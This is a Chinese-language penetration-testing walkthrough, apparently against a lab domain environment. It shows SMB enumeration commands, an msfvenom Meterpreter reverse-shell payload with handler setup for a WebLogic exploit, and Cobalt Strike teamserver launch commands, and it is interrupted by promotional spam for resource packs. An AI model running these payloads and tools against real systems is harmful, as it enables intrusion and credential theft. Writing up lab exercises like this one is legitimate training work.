本文主要是介绍渗透实战:内网域渗透,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
前言
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
网络拓扑如下:
web服务器
先来波端口扫描:
直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完weblogic后我们在改回192段。
【一>所有资源获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
看到了weblogic的版本,查找下exp,顺手先来一波smb信息收集。
smb信息收集
smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12
rpcclient -U '' 10.10.20.12
smbclient -U '' -L \\10.10.20.12
weblogic漏洞利用
知道了weblogic的具体版本,可以直接去查询漏洞,也可以用工具自动扫描下;
这里直接用CVE的漏洞来打一波;
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4 LPORT=1234 -f psh-cmd > exploit.ps1
# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
# set lhost 10.10.20.4
# set lport 1234
# exploit
1
2
3
4
5
6
7
8
9
迁移下进程,开始抓密码;
爆破一波,原来是个弱口令;
接下来换成CS更方便;
./teamserver 192.168.223.138 123456
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar
信息收集一波;
这篇关于渗透实战:内网域渗透的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!